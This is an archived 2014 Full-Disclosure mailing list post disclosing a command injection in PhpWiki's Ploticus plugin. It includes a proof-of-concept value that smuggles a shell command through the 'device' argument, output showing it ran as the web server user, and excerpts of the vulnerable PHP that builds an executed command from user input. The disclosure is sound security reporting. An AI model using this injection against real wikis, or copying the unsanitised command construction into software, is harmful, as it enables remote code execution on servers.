lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Aug 2014 23:23:45 +0100
From: "Benjamin Harris" <>
Subject: [FD] PHP-Wiki Command Injection

Hi All

OSS-Security, can I get a CVE for this please?


I tried to report this a month ago, but got no response from the 
developers. This is an old vulnerability I found while dusting off 
some old hard drives.


PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site 
where anyone can edit the pages through an HTML form. Multiple 
storage backends, dynamic hyperlinking, themeable, scriptable by 
plugins, full authentication, ACL's.


Straight command injection in the Ploticus module. Attached is a 
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= 
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned

vuln code with system execute at the bottom
controllable param is $args
           $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

['device'] is listed as an option by user when using the Politus 

example usage;
 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...


   function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        $source =& $this->source;
        if (!empty($source)) {
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed 
in Ploticus");
                return false;
            if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                        $src .= ("\t" . '"' . $data . '" ' . $i++ . 
                $src .= $source;
                $source = $src;
            $tempfile = $this->tempnam('Ploticus','plo');
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $";
                    $this->_mapfile = "$";
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default 
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
                    $args .= (" -prefab " . $argarray['-prefab']);
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

Many thanks,
View attachment "" of type "text/x-python" (1855 bytes)

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists